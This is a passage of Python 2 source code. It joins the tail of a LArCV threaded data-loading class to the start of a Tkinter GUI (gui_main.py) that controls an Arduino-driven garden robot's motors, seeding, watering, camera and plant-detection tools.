sys.stderr.write('filler_cfg file does not exist: %s\n' % self._cfg_file) raise ValueError # set verbosity if 'verbosity' in cfg: self._verbose = bool(cfg['verbosity']) # configure thread processor self._proc = larcv.ThreadProcessor(self._name) self._proc.configure(self._cfg_file) self._storage_v = [] for storage_id in range(self._proc.storage_status_array().size()): self._storage_v.append(threadio_storage(storage_id)) # fetch batch filler info make_copy = bool('make_copy' in cfg and cfg['make_copy']) for i in xrange(self._proc.batch_fillers().size()): pid = self._proc.batch_fillers()[i] name = self._proc.storage_name(pid) dtype = larcv.BatchDataTypeName(self._proc.batch_types()[i]) for storage_id in range(self._proc.storage_status_array().size()): self._storage_v[storage_id].register(name,dtype,make_copy=make_copy) # all success? # register *this* instance self.__class__._instance_m[self._name] = self def start_manager(self, batch_size): if not self._proc or not self._proc.configured(): sys.stderr.write('must call configure(cfg) before start_manager()!\n') return try: batch_size=int(batch_size) if batch_size<1: sys.stderr.write('batch_size must be positive integer!\n') raise ValueError except TypeError, ValueError: sys.stderr.write('batch_size value/type error. aborting...\n') return self._batch=batch_size self._proc.start_manager(batch_size) for storage in self._storage_v: self._thread_v.append(threading.Thread(target = threadio_func, args=[storage,self._proc])) self._thread_v[-1].daemon = True self._thread_v[-1].start() self._target_storage_id=0 def stop_manager(self): if not self._proc or not self._proc.configured(): sys.stderr.write('must call configure(cfg) before start_manager()!\n') return self._batch=None self._proc.stop_manager() for storage in self._storage_v: storage._threaded = False time.sleep(0.1) self._thread_v = [] def purge_storage(self): if not self._proc or not self._proc.configured(): sys.stderr.write('must call configure(cfg) before start_manager()!\n') return self.stop_manager() self._proc.release_data() self._target_storage_id=0 def set_next_index(self,index): if not self._proc or not self._proc.configured(): sys.stderr.write('must call configure(cfg) before start_manager()!\n') return self._proc.set_next_index(index) def is_reading(self,storage_id=None): if storage_id is None: storage_id = self._target_storage_id return not self._storage_v[storage_id]._filled def next(self): while self.is_reading(): time.sleep(0.000002) self._proc.release_data(self._target_storage_id) self._storage_v[self._target_storage_id].release() self._target_storage_id += 1 if self._target_storage_id == self._proc.num_batch_storage(): self._target_storage_id = 0 return def fetch_data(self,key,storage_id=None): if storage_id is None: storage_id = self._target_storage_id try: return self._storage_v[storage_id].fetch_data(key) except IndexError: sys.stderr.write('Cannot fetch data w/ storage id {:d} (unknown)\n'.format(storage_id)) return def fetch_event_ids(self,storage_id=None): if storage_id is None: storage_id = self._target_storage_id return self._storage_v[storage_id]._event_ids def fetch_entries(self,storage_id=None): if storage_id is None: storage_id = self._target_storage_id return self._storage_v[storage_id]._ttree_entries def fetch_n_entries(self): return self._proc.get_n_entries() def sig_kill(signal,frame): print('\033[95mSIGINT detected.\033[00m Finishing the program gracefully.') for name,ptr in larcv_threadio._instance_m.iteritems(): print('Terminating filler: %s' % name) ptr.reset() signal.signal(signal.SIGINT, sig_kill)
gui_main.py
import cv2 import numpy as np import threading import json import random import math import time import types #import Tkinter from Tkinter import * import tkFileDialog import ttk import tkMessageBox import tkFont import ScrolledText import Pmw from PIL import Image from PIL import ImageTk from os import listdir, path, makedirs, remove from datetime import datetime from class_ArduinoSerMntr import* from class_CameraMntr import* import class_MyThread import class_ImageProcessing from class_PlantIdentifier import PlantIdentifier import imgProcess_tool import gui_vars from class_ConfigSetting import ConfigSetting #from class_ConfigSetting_new import ConfigSetting from dialog_PeripheralSetting import PeripheralSetting from dialog_MotorSetting import MotorSetting from dialog_CameraConnection import CameraConnection import utils_tool class App: # Ininitalization def __init__(self,root): strFont= 'Arial' myfont14 = tkFont.Font(family=strFont, size=14, weight= tkFont.BOLD) myfont12 = tkFont.Font(family=strFont, size=12)#, weight= tkFont.BOLD) myfont12_Bold = tkFont.Font(family=strFont, size=12, weight= tkFont.BOLD) myfont10 = tkFont.Font(family=strFont, size=10) myfont10_Bold = tkFont.Font(family=strFont, size=10, weight= tkFont.BOLD) #2018.02.28 myfont8 = tkFont.Font(family=strFont, size=8, weight= tkFont.BOLD) self.bgGreen= '#007700' self.bgGreen_active= '#00aa00' bgGray= '#333333333' bgGray_active= 'gray' bgGray_select= '#999' self.bgRed= '#aa0000' self.bgRed_active= '#ee0000' self.Move_intervalUnit= 1 ''' self.root = Tkinter.Tk() self.root.title("[Arduino] Stepper Control") self.root.attributes('-zoomed', True) # FullScreen ''' self.root= root self.root.update() # ================================= # Parameters # ================================= if utils_tool.check_path(gui_vars.saveParaPath): print 'ICON...' self.img_icon = Tkinter.PhotoImage(file = gui_vars.saveParaPath+'Icon_2.png') #img_icon = Tkinter.PhotoImage(file = gui_vars.saveParaPath+'img_Seed.png') #print self.img_icon self.root.tk.call('wm', 'iconphoto', self.root._w, self.img_icon) self.config= ConfigSetting(gui_vars.saveParaPath, gui_vars.configName, gui_vars.defaultDict) params= self.config.read_json() #print 'para: ',params self.threshold_graylevel= params['thrshd_gray'] self.threshold_MinSize= params['thrshd_Minsize'] self.threshold_MaxSize= params['thrshd_Maxsize'] self.scan_X= params['Scan_X (Beg,Interval,Amount)'] self.scan_Y= params['Scan_Y (Beg,Interval,Amount)'] self.limit= params['limit Maximum (X,Y)'] self.MaxSpeed= params['Max Speed (X, Y)'] self.Acceleration= params['Ac/Deceleration (X, Y)'] self.CameraID= params['Camera ID'] self.Peripheral_para= params['Peripheral Setting'] self.rdbtnMvAmount_Mode= params['Move Amount type (5 types)'] self.scriptPath= params['script Path'] self.pinNumb_fan= 8 self.pinNumb_water= 9 self.pinNumb_seed= 10 #for key, value in params['Peripheral Setting']: for key, value in self.Peripheral_para: #2018.02.28 print key, value #2018.02.28 if key.strip().replace(' ','').lower() == 'waterpump': # is -> == 2018.02.28 self.pinNumb_water= value print 'pinNumb_water: ', self.pinNumb_water #2018.02.28 if key.strip().replace(' ','').lower() == 'vaccumpump': # is -> == 2018.02.28 self.pinNumb_seed= value print 'pinNumb_seed: ', self.pinNumb_seed #2018.02.28 if key.strip().replace(' ','').lower() == 'fan': # is -> == 2018.02.28 self.pinNumb_fan= value print 'pinNumb_fan: ', self.pinNumb_fan #2018.02.28 print 'Pin Value: ',self.Peripheral_para #2018.02.28 self.imageProcessor= class_ImageProcessing.contour_detect(gui_vars.savePath,gui_vars.saveParaPath) self.checkmouse_panel_mergeframe= False self.x1, self.y1, self.x2, self.y2= -1,-1,-1,-1 self.StartScan_judge= False self.StartRunScript_judge= False self.saveScanning= 'XXX' self.strStatus= 'Idling...' self.readmergeframeIndex= '' self.root.update() self.screen_width, self.screen_height= self.root.winfo_width(), self.root.winfo_height() print 'screen: ',[self.root.winfo_screenwidth(), self.root.winfo_screenheight()] print 'w, h: ',[self.root.winfo_width(), self.root.winfo_height()] btn_width, btn_height= 8, 1 #gui_vars.interval_x, gui_vars.interval_y= 6, 6 self.mergeframe_spaceY= 50 #print width,',', height,' ; ',btn_width,',', btn_height # ======================================= # [Config] Menu Bar # ======================================= self.menubar= Tkinter.Menu(self.root) self.FileMenu = Tkinter.Menu(self.menubar, tearoff=0) self.menubar.add_cascade(label="File",underline=0, menu=self.FileMenu) self.FileMenu.add_command(label="Load Image", command=self.btn_loadImg_click) self.FileMenu.add_command(label="Save Image", command=self.btn_saveImg_click) self.SettingMenu = Tkinter.Menu(self.menubar, tearoff=0) self.SettingMenu.add_command(label= "Peripheral Setting", command= self.set_Peripheral) self.SettingMenu.add_command(label= "Motor Setting", command= self.set_Motor) self.menubar.add_cascade(label="Setting", underline=0, menu=self.SettingMenu) self.ConnectMenu = Tkinter.Menu(self.menubar, tearoff=0) self.ConnectMenu.add_command(label="Connect to Arduino", command=self.set_ArdConnect) self.ConnectMenu.add_command(label="Connect to Camera", command=self.set_CamConnect) self.menubar.add_cascade(label="Communication", underline= 0, menu=self.ConnectMenu) self.ImgProcess= Tkinter.Menu(self.menubar, tearoff=0) self.ImgProcess.add_command(label="Set Background", command= self.plastic_set_background) self.ImgProcess.add_command(label='Otsu Binary', command= self.method_OtsuBinary) self.menubar.add_cascade(label="Image Processing", underline=0, menu= self.ImgProcess) self.root.config(menu= self.menubar) self.root.update() # ======================================= # [Config] Status Bar # ======================================= self.statuslabel = Tkinter.Label(self.root, bd = 1, relief = Tkinter.SUNKEN, anchor = "w") self.statuslabel.config(text="IDLING ..................") self.statuslabel.pack(side = Tkinter.BOTTOM,fill=Tkinter.X) self.root.update() # ================================================== # [ROOT] Current position of motor # ================================================== self.lbl_CurrPos= Tkinter.Label(self.root, text="Location: (X, Y, Z)= (-1, -1, -1)",font= myfont14) self.lbl_CurrPos.place(x= gui_vars.interval_x, y= gui_vars.interval_y) self.root.update() # ==================== # [Config] Tabpages # ==================== self.screen_width, self.screen_height= self.root.winfo_width(), self.root.winfo_height() #Left_width= self.lbl_MoveCoord.winfo_reqwidth()+ gui_vars.interval_x*11 Left_width= int((self.screen_width-gui_vars.interval_x*2)*0.25) Left_height= int((self.screen_height-self.FileMenu.winfo_reqheight()*1- self.statuslabel.winfo_reqheight()*0-gui_vars.interval_y*2- self.lbl_CurrPos.winfo_reqheight())) self.tabbox = ttk.Notebook(self.root, width=Left_width, height=Left_height) self.tab_control = Tkinter.Frame(self.root) self.tab_loadscript = Tkinter.Frame(self.root) self.tab_imageprocess = Tkinter.Frame(self.root) self.tabbox.add(self.tab_control, text="CONTROL") self.tabbox.add(self.tab_loadscript, text="LOAD SCRIPT") self.tabbox.add(self.tab_imageprocess, text="IMAGE") #self.tabbox.place(x= 0, y= 0) self.tabbox.place(x= 0, y= self.lbl_CurrPos.winfo_y()+ self.lbl_CurrPos.winfo_reqheight()+ gui_vars.interval_y) self.root.update() print '*** Input Tab', Left_width, Left_height print '*** TAB',self.tabbox.winfo_reqwidth(), self.tabbox.winfo_reqheight() # ================================================== # [TAB CONTROL] Step Motor Control # ================================================== self.lbl_MoveCoord= Tkinter.Label(self.tab_control, text="[ MOVE ]", font= myfont14) #self.lbl_MoveCoord.place(x= gui_vars.interval_x, y= self.lbl_CurrPos.winfo_y()+ self.lbl_CurrPos.winfo_height()+gui_vars.interval_y) self.lbl_MoveCoord.place(x= gui_vars.interval_x, y= gui_vars.interval_y) self.root.update() # ================================================== # [TAB CONTROL] Move Amount Radio Button # ================================================== #self.rdbtnMvAmount_Mode= [('100', 100),('500', 500),('1k',1000),('10k',10000), ('100k',100000)] #self.rdbtnMvAmount_Mode= [('10mm', 10),('50mm', 50),('100mm',100),('200mm',200), ('500mm',500)] -2018.02.28-CGH #Save in Farmbot_GeneralAP\Para\config.json - 2018.02.28 self.MvAmount= Tkinter.IntVar() self.rdbtn_MvAmount_1= Tkinter.Radiobutton(self.tab_control, text= self.rdbtnMvAmount_Mode[0][0], value= self.rdbtnMvAmount_Mode[0][1],variable= self.MvAmount,font= myfont12_Bold, command= self.rdbtn_MvAmount_click, indicatoron=0, width=5, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active,selectcolor= bgGray_select) self.rdbtn_MvAmount_1.place(x= gui_vars.interval_x, y=self.lbl_MoveCoord.winfo_y()+ self.lbl_MoveCoord.winfo_reqheight()+ gui_vars.interval_y) self.root.update() self.rdbtn_MvAmount_5= Tkinter.Radiobutton(self.tab_control, text= self.rdbtnMvAmount_Mode[1][0], value=self.rdbtnMvAmount_Mode[1][1], variable= self.MvAmount,font= myfont12_Bold, command= self.rdbtn_MvAmount_click, indicatoron=0, width=5, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active,selectcolor= bgGray_select) self.rdbtn_MvAmount_5.place(x= gui_vars.interval_x+ self.rdbtn_MvAmount_1.winfo_x()+ self.rdbtn_MvAmount_1.winfo_reqwidth(),y= self.rdbtn_MvAmount_1.winfo_y()) self.root.update() self.rdbtn_MvAmount_10= Tkinter.Radiobutton(self.tab_control, text= self.rdbtnMvAmount_Mode[2][0], value=self.rdbtnMvAmount_Mode[2][1], variable= self.MvAmount,font= myfont12_Bold, command= self.rdbtn_MvAmount_click, indicatoron=0, width=5, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active,selectcolor= bgGray_select) self.rdbtn_MvAmount_10.place(x= gui_vars.interval_x+ self.rdbtn_MvAmount_5.winfo_x()+ self.rdbtn_MvAmount_5.winfo_reqwidth(),y= self.rdbtn_MvAmount_1.winfo_y()) self.root.update() self.rdbtn_MvAmount_50= Tkinter.Radiobutton(self.tab_control, text= self.rdbtnMvAmount_Mode[3][0], value=self.rdbtnMvAmount_Mode[3][1], variable= self.MvAmount,font= myfont12_Bold, command= self.rdbtn_MvAmount_click, indicatoron=0, width=5, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active,selectcolor= bgGray_select) self.rdbtn_MvAmount_50.place(x= gui_vars.interval_x+ self.rdbtn_MvAmount_10.winfo_x()+ self.rdbtn_MvAmount_10.winfo_reqwidth(),y= self.rdbtn_MvAmount_1.winfo_y()) self.root.update() self.rdbtn_MvAmount_100= Tkinter.Radiobutton(self.tab_control, text= self.rdbtnMvAmount_Mode[4][0], value=self.rdbtnMvAmount_Mode[4][1], variable= self.MvAmount,font= myfont12_Bold, command= self.rdbtn_MvAmount_click, indicatoron=0, width=5, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active,selectcolor= bgGray_select) self.rdbtn_MvAmount_100.place(x= gui_vars.interval_x+ self.rdbtn_MvAmount_50.winfo_x()+ self.rdbtn_MvAmount_50.winfo_reqwidth(),y= self.rdbtn_MvAmount_1.winfo_y()) self.root.update() #self.rdbtn_MvAmount_10.select() #self.Move_interval= self.rdbtnMvAmount_Mode[2][1] self.rdbtn_MvAmount_1.select() #2018.02.28 self.Move_interval= self.rdbtnMvAmount_Mode[0][1] #2018.02.28 self.lbl_posUnit_1= Tkinter.Label(self.tab_control, text='(step)') self.lbl_posUnit_1.place(x= self.rdbtn_MvAmount_100.winfo_x()+ self.rdbtn_MvAmount_100.winfo_width(), y= self.rdbtn_MvAmount_1.winfo_y()+gui_vars.interval_y) self.root.update() # ================================================== # [TAB CONTROL] Move 1 interval at specific Axis # ================================================== photo_up= self.IconResize(gui_vars.saveParaPath+'img_Up.png') self.btn_MoveUp= Tkinter.Button(self.tab_control,image= photo_up, cursor= 'hand2', command= lambda: self.btn_MoveAmount_click('Up')) self.btn_MoveUp.image= photo_up self.btn_MoveUp.place(x= self.rdbtn_MvAmount_10.winfo_x()+int(self.rdbtn_MvAmount_10.winfo_reqwidth()*0), y=self.rdbtn_MvAmount_1.winfo_y()+ self.rdbtn_MvAmount_1.winfo_reqheight()+ gui_vars.interval_y) self.root.update() photo_down= self.IconResize(gui_vars.saveParaPath+'img_Down.png') self.btn_MoveDown= Tkinter.Button(self.tab_control,image= photo_down, cursor= 'hand2', command= lambda: self.btn_MoveAmount_click('Down')) self.btn_MoveDown.image= photo_down self.btn_MoveDown.place(x= self.btn_MoveUp.winfo_x(), y=self.btn_MoveUp.winfo_y()+ self.btn_MoveUp.winfo_reqheight()+ gui_vars.interval_y) self.root.update() photo_left= self.IconResize(gui_vars.saveParaPath+'img_Left.png') self.btn_MoveLeft= Tkinter.Button(self.tab_control,image= photo_left, cursor= 'hand2', command= lambda: self.btn_MoveAmount_click('Left')) self.btn_MoveLeft.image= photo_left self.btn_MoveLeft.place(x= self.btn_MoveDown.winfo_x()- self.btn_MoveDown.winfo_width()- gui_vars.interval_x, y=self.btn_MoveDown.winfo_y()) self.root.update() photo_right= self.IconResize(gui_vars.saveParaPath+'img_Right.png') self.btn_MoveRight= Tkinter.Button(self.tab_control,image= photo_right, cursor= 'hand2', command= lambda: self.btn_MoveAmount_click('Right')) self.btn_MoveRight.image= photo_right self.btn_MoveRight.place(x= self.btn_MoveDown.winfo_x()+ self.btn_MoveDown.winfo_width()+ gui_vars.interval_x, y=self.btn_MoveDown.winfo_y()) self.root.update() self.btn_MoveZUp= Tkinter.Button(self.tab_control,image= photo_up, cursor= 'hand2', command= lambda: self.btn_MoveAmountZaxis_click('Up')) self.btn_MoveZUp.image= photo_up self.btn_MoveZUp.place(x= self.btn_MoveRight.winfo_x()+ self.btn_MoveRight.winfo_reqwidth()+ gui_vars.interval_x*4, y=self.btn_MoveUp.winfo_y()) self.root.update() self.btn_MoveZDown= Tkinter.Button(self.tab_control,image= photo_down, cursor= 'hand2', command= lambda: self.btn_MoveAmountZaxis_click('Down')) self.btn_MoveZDown.image= photo_down self.btn_MoveZDown.place(x= self.btn_MoveZUp.winfo_x(), y=self.btn_MoveDown.winfo_y()) self.root.update() # ================================================== # [TAB CONTROL] Seeding, Watering, Lighting, Grab Image # ================================================== photo_seed= self.IconResize(gui_vars.saveParaPath+'img_Seed.png') self.btn_Seed= Tkinter.Button(self.tab_control,image= photo_seed, cursor= 'hand2', command= self.btn_Seed_click) self.btn_Seed.image= photo_seed self.btn_Seed.place(x= self.btn_MoveUp.winfo_x()- int(self.btn_MoveUp.winfo_reqwidth()*2)- gui_vars.interval_x, y=self.btn_MoveDown.winfo_y()+ self.btn_MoveDown.winfo_reqheight()+ gui_vars.interval_y*2) self.root.update() photo_water= self.IconResize(gui_vars.saveParaPath+'img_Water.png') self.btn_Water= Tkinter.Button(self.tab_control,image= photo_water, cursor= 'hand2', command= self.btn_Water_click) self.btn_Water.image= photo_water self.btn_Water.place(x= self.btn_Seed.winfo_x()+ int(self.btn_Seed.winfo_reqwidth()*1.5)+ gui_vars.interval_x, y=self.btn_Seed.winfo_y()) self.root.update() photo_light= self.IconResize(gui_vars.saveParaPath+'img_Light.png') self.btn_Light= Tkinter.Button(self.tab_control,image= photo_light, cursor= 'hand2', command= self.btn_Light_click) self.btn_Light.image= photo_light self.btn_Light.place(x= self.btn_Water.winfo_x()+ int(self.btn_Water.winfo_reqwidth()*1.5)+ gui_vars.interval_x, y=self.btn_Seed.winfo_y()) self.root.update() photo_cam= self.IconResize(gui_vars.saveParaPath+'img_Cam.png') self.btn_CamGrab= Tkinter.Button(self.tab_control,image= photo_cam, cursor= 'hand2', command= self.btn_saveImg_click) self.btn_CamGrab.image= photo_cam self.btn_CamGrab.place(x= self.btn_Light.winfo_x()+ int(self.btn_Light.winfo_reqwidth()*1.5)+ gui_vars.interval_x, y=self.btn_Seed.winfo_y()) self.root.update() # ================================================== # [TAB CONTROL] Move To # ================================================== self.lbl_Xpos= Tkinter.Label(self.tab_control, text= 'X :',font= myfont12) #self.lbl_Xpos.place(x= gui_vars.interval_x, y = self.btn_MoveDown.winfo_y()+ self.btn_MoveDown.winfo_height()+gui_vars.interval_y*3) self.lbl_Xpos.place(x= gui_vars.interval_x, y = self.btn_Seed.winfo_y()+ self.btn_Seed.winfo_height()+gui_vars.interval_y*3) self.root.update() self.entry_Xpos= Tkinter.Entry(self.tab_control, font= myfont12, width=4) self.entry_Xpos.insert(Tkinter.END, "0") self.entry_Xpos.place(x= self.lbl_Xpos.winfo_x()+ self.lbl_Xpos.winfo_width(), y= self.lbl_Xpos.winfo_y()) self.root.update() self.lbl_Ypos= Tkinter.Label(self.tab_control, text= 'Y :',font= myfont12) self.lbl_Ypos.place(x= self.entry_Xpos.winfo_x()+ self.entry_Xpos.winfo_width()+ gui_vars.interval_x, y = self.lbl_Xpos.winfo_y()) self.root.update() self.entry_Ypos= Tkinter.Entry(self.tab_control, font= myfont12, width=4) self.entry_Ypos.insert(Tkinter.END, "0") self.entry_Ypos.place(x= self.lbl_Ypos.winfo_x()+ self.lbl_Ypos.winfo_width(), y= self.lbl_Ypos.winfo_y()) self.root.update() self.lbl_Zpos= Tkinter.Label(self.tab_control, text= 'Z :',font= myfont12) self.lbl_Zpos.place(x= self.entry_Ypos.winfo_x()+ self.entry_Ypos.winfo_width()+ gui_vars.interval_x, y = self.lbl_Xpos.winfo_y()) self.root.update() self.entry_Zpos= Tkinter.Entry(self.tab_control, font= myfont12, width=4) self.entry_Zpos.insert(Tkinter.END, "0") self.entry_Zpos.place(x= self.lbl_Zpos.winfo_x()+ self.lbl_Zpos.winfo_width(), y= self.lbl_Zpos.winfo_y()) self.root.update() self.lbl_posUnit= Tkinter.Label(self.tab_control, text='(step)') self.lbl_posUnit.place(x= self.entry_Zpos.winfo_x()+ self.entry_Zpos.winfo_width(), y= self.entry_Zpos.winfo_y()+gui_vars.interval_y) self.root.update() self.btn_MoveTo= Tkinter.Button(self.tab_control, text= 'GO', command= self.btn_MoveTo_click,font= myfont12_Bold, bg= self.bgGreen, fg= 'white', activebackground= self.bgGreen_active, activeforeground= 'white') self.btn_MoveTo.place(x= self.lbl_posUnit.winfo_x()+ self.lbl_posUnit.winfo_reqwidth()+ gui_vars.interval_x, y=self.lbl_Ypos.winfo_y()) self.btn_MoveTo.focus_set() self.root.update() # ================================================== # [TAB CONTROL] Scanning Control # ================================================== self.lbl_Scan= Tkinter.Label(self.tab_control, text="[ AUTO-SCAN ]", font= myfont14) self.lbl_Scan.place(x= gui_vars.interval_x, y= self.btn_MoveTo.winfo_y()+ self.btn_MoveTo.winfo_height()+gui_vars.interval_y) self.root.update() self.lbl_Scan1stPt= Tkinter.Label(self.tab_control, text= '*Start point (X, Y):',font= myfont12) self.lbl_Scan1stPt.place(x= gui_vars.interval_x, y = self.lbl_Scan.winfo_y()+ self.lbl_Scan.winfo_height()+gui_vars.interval_y) self.root.update() self.entry_1stXpos= Tkinter.Entry(self.tab_control, font= myfont12, width= 6) self.entry_1stXpos.insert(Tkinter.END, '{0}'.format(self.scan_X[0])) self.entry_1stXpos.place(x= self.lbl_Scan1stPt.winfo_x(), y= self.lbl_Scan1stPt.winfo_y()+ self.lbl_Scan1stPt.winfo_height()) self.root.update() self.lbl_Scan1stPt_comma= Tkinter.Label(self.tab_control, text= ', ', font= myfont12) self.lbl_Scan1stPt_comma.place(x=self.entry_1stXpos.winfo_x()+self.entry_1stXpos.winfo_width(), y= self.entry_1stXpos.winfo_y()) self.root.update() self.entry_1stYpos= Tkinter.Entry(self.tab_control, font= myfont12, width=6) self.entry_1stYpos.insert(Tkinter.END, '{0}'.format(self.scan_Y[0])) self.entry_1stYpos.place(x= self.lbl_Scan1stPt_comma.winfo_x()+self.lbl_Scan1stPt_comma.winfo_width(), y= self.lbl_Scan1stPt_comma.winfo_y()) self.root.update() self.lbl_ScanInterval= Tkinter.Label(self.tab_control, text='* Interval (X, Y) :', font= myfont12) self.lbl_ScanInterval.place(x= self.entry_1stYpos.winfo_x()+ self.entry_1stYpos.winfo_reqwidth()+ gui_vars.interval_x*4, y= self.lbl_Scan1stPt.winfo_y()) self.root.update() self.entry_ScanInterval_X= Tkinter.Entry(self.tab_control, font=myfont12, width=6) self.entry_ScanInterval_X.insert(Tkinter.END, '{0}'.format(self.scan_X[1])) self.entry_ScanInterval_X.place(x= self.lbl_ScanInterval.winfo_x(), y= self.lbl_ScanInterval.winfo_y()+self.lbl_ScanInterval.winfo_height()) self.root.update() self.lbl_ScanInterval_comma= Tkinter.Label(self.tab_control, text= ', ', font= myfont12) self.lbl_ScanInterval_comma.place(x=self.entry_ScanInterval_X.winfo_x()+self.entry_ScanInterval_X.winfo_width(), y= self.entry_ScanInterval_X.winfo_y()) self.root.update() self.entry_ScanInterval_Y= Tkinter.Entry(self.tab_control, font= myfont12, width=6) self.entry_ScanInterval_Y.insert(Tkinter.END, '{0}'.format(self.scan_Y[1])) self.entry_ScanInterval_Y.place(x= self.lbl_ScanInterval_comma.winfo_x()+self.lbl_ScanInterval_comma.winfo_width(), y= self.lbl_ScanInterval_comma.winfo_y()) self.root.update() self.lbl_ScanAmount= Tkinter.Label(self.tab_control, text='* Scanning Step (X, Y) :', font= myfont12) self.lbl_ScanAmount.place(x= self.entry_1stXpos.winfo_x(), y= self.entry_1stXpos.winfo_y()+ self.entry_1stXpos.winfo_height()+gui_vars.interval_y) self.root.update() self.entry_ScanAmount_X= Tkinter.Entry(self.tab_control, font=myfont12, width=6) self.entry_ScanAmount_X.insert(Tkinter.END, '{0}'.format(self.scan_X[2])) self.entry_ScanAmount_X.place(x= self.lbl_ScanAmount.winfo_x(), y= self.lbl_ScanAmount.winfo_y()+self.lbl_ScanAmount.winfo_height()) self.root.update() self.lbl_ScanAmount_comma= Tkinter.Label(self.tab_control, text= ', ', font= myfont12) self.lbl_ScanAmount_comma.place(x=self.entry_ScanAmount_X.winfo_x()+self.entry_ScanAmount_X.winfo_width(),y= self.entry_ScanAmount_X.winfo_y()) self.root.update() self.entry_ScanAmount_Y= Tkinter.Entry(self.tab_control, font= myfont12, width=6) self.entry_ScanAmount_Y.insert(Tkinter.END, '{0}'.format(self.scan_Y[2])) self.entry_ScanAmount_Y.place(x= self.lbl_ScanAmount_comma.winfo_x()+self.lbl_ScanAmount_comma.winfo_width(), y= self.lbl_ScanAmount_comma.winfo_y()) self.root.update() self.btn_StartScan= Tkinter.Button(self.tab_control, text= 'Start Scan', command= self.btn_StartScan_click,font= myfont12_Bold, fg= 'white', activeforeground='white', bg=self.bgGreen, activebackground=self.bgGreen_active, width= btn_width, height= btn_height) self.btn_StartScan.place(x= self.entry_ScanInterval_X.winfo_x()+ gui_vars.interval_x*6, y=self.lbl_ScanAmount.winfo_y()+gui_vars.interval_y*2) self.root.update() # ================================================== # [TAB LOAD SCRIPT] # ================================================== self.lbl_loadscript= Tkinter.Label(self.tab_loadscript, text="[ Load & Run Script ]", font= myfont14) self.lbl_loadscript.place(x= gui_vars.interval_x, y= gui_vars.interval_y) self.root.update() self.entry_scriptPath= Tkinter.Entry(self.tab_loadscript, font= myfont12, width=25) self.entry_scriptPath.insert(Tkinter.END, self.scriptPath) self.entry_scriptPath.place(x= self.lbl_loadscript.winfo_x(), y= self.lbl_loadscript.winfo_y()+ self.lbl_loadscript.winfo_reqheight()+ gui_vars.interval_y) self.root.update() self.btn_choosescript= Tkinter.Button(self.tab_loadscript, text='...', command= self.btn_choosescript_click, font= myfont8, width=0, height=0) self.btn_choosescript.place(x= self.entry_scriptPath.winfo_x()+ self.entry_scriptPath.winfo_reqwidth()+ gui_vars.interval_x, y= self.entry_scriptPath.winfo_y()) self.root.update() self.btn_loadscript= Tkinter.Button(self.tab_loadscript, text='Load', command= self.btn_loadscript_click, font= myfont12_Bold, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active) self.btn_loadscript.place(x= self.entry_scriptPath.winfo_x(), y= self.entry_scriptPath.winfo_y()+ self.entry_scriptPath.winfo_reqheight()+ gui_vars.interval_y) self.root.update() self.btn_savescript= Tkinter.Button(self.tab_loadscript, text='Save', command= self.btn_savescript_click, font= myfont12_Bold, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active) self.btn_savescript.place(x= self.btn_loadscript.winfo_x()+ self.btn_loadscript.winfo_reqwidth()+ gui_vars.interval_x*2, y= self.btn_loadscript.winfo_y()) self.root.update() self.btn_runscript= Tkinter.Button(self.tab_loadscript, text='RUN', command= self.btn_runscript_click, font= myfont12_Bold, fg= 'white', activeforeground='white', bg= self.bgGreen, activebackground= self.bgGreen_active) self.btn_runscript.place(x= self.btn_savescript.winfo_x()+ self.btn_savescript.winfo_reqwidth()+ gui_vars.interval_x*2, y= self.btn_savescript.winfo_y()) self.btn_runscript.focus_set() self.root.update() #self.txtbox_script = ScrolledText.ScrolledText(self.tab_loadscript, width=40, height= 30 ,font = myfont10, bd = 2, relief = RIDGE, vscrollmode= 'dynamic') self.txtbox_script = Pmw.ScrolledText(self.tab_loadscript, text_width=40, text_height= 20, hscrollmode= 'dynamic', vscrollmode= 'static', text_wrap= 'none', labelpos= 'n', label_text= "NaN")#, rowheader= 1) self.txtbox_script.place(x= self.btn_loadscript.winfo_x(), y= self.btn_loadscript.winfo_y()+ self.btn_loadscript.winfo_reqheight()+ gui_vars.interval_y) # ================================================== # [TAB IMAGE] Image Processing # ================================================== self.btn_saveImg= Tkinter.Button(self.tab_imageprocess, text='Save Image', command= self.btn_saveImg_click,font= myfont14, width= btn_width, height= btn_height) self.btn_saveImg.place(x= gui_vars.interval_x, y= gui_vars.interval_y) self.root.update() self.lbl_scracth_detect= Tkinter.Label(self.tab_imageprocess, text="[ Detect Green Plant ]", font= myfont14) self.lbl_scracth_detect.place(x= gui_vars.interval_x, y= self.btn_saveImg.winfo_y()+ self.btn_saveImg.winfo_reqheight()+ gui_vars.interval_y) self.root.update() self.btn_detect= Tkinter.Button(self.tab_imageprocess, text='Detect', command= self.detectGreenPlant,font= myfont12_Bold, width= btn_width, height= btn_height, fg= 'white',activeforeground='white', bg= bgGray,activebackground= bgGray_active) self.btn_detect.place(x= self.lbl_scracth_detect.winfo_x()+ self.lbl_scracth_detect.winfo_reqwidth()+ gui_vars.interval_x, y= self.lbl_scracth_detect.winfo_y()) self.root.update() #============================================= # [group] Plant Index #============================================= self.grp_PlantIndex= Tkinter.LabelFrame(self.tab_imageprocess, text= 'Plant Index', width=Left_width-gui_vars.interval_x*2 ,height=40, relief=Tkinter.RIDGE, padx=0, pady=0)#, font= self.__myfont12_Bold) y_rdbox= self.lbl_scracth_detect.winfo_y()+ self.lbl_scracth_detect.winfo_height()+ gui_vars.interval_y self.lst_PlantIndex_rdbox = list() self.PlantIndex= Tkinter.IntVar() for idx, name in enumerate(gui_vars.rdbox_PlantIndexItem): self.lst_PlantIndex_rdbox.append(Tkinter.Radiobutton(self.grp_PlantIndex, text = name, value=idx, variable = self.PlantIndex, indicatoron=1, command= self.rdbtn_PlantINdex_click)) self.lst_PlantIndex_rdbox[idx].place(x= gui_vars.interval_x+ gui_vars.interval_rdbox*idx, y=0) self.lst_PlantIndex_rdbox[0].select() self.grp_PlantIndex.place(x= gui_vars.interval_x, y=y_rdbox) self.root.update() #============================================= # [group] Binary Method #============================================= self.grp_BinaryMethod= Tkinter.LabelFrame(self.tab_imageprocess, text= 'Binary Method', width=Left_width-gui_vars.interval_x*2 ,height=40, relief=Tkinter.RIDGE, padx=0, pady=0)#, font= self.__myfont12_Bold) 